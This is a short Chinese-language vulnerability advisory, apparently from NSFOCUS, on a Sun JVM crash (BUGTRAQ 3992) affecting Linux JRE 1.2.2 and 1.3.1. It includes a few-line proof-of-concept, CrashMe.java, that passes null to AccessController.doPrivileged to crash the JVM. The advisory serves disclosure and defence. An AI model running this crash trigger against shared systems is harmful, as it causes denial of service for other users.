Sun Java虚拟机段非法访问漏洞

受影响的系统:
Sun JRE (Linux Production Release) 1.3.1
Sun JRE (Linux Production Release) 1.2.2

不受影响系统:

描述:
--------------------------------------------------------------------------------


BUGTRAQ ID: 3992

Java程序运行于Java虚拟机（JVM）的解释环境。Sun提供了多种平台下的JVM，包括Solaris, Windows, Linux。

一个恶意结构的Java程序可以使Sun JVM崩溃，因此导致共享环境拒绝服务。Sun JVM的Linux发行版本已经证实存在这个漏洞。

<*来源：Taeho Oh （ohhara@postech.edu）
*>

测试程序：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！



Taeho Oh （ohhara@postech.edu）提供了如下测试方法：

CrashMe.java:

public class CrashMe
{
public static void main(String[] args)
{
java.security.AccessController.doPrivileged
((java.security.PrivilegedAction)null);
}
}



--------------------------------------------------------------------------------
建议:

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 暂时停止Linux发行版本的JVM。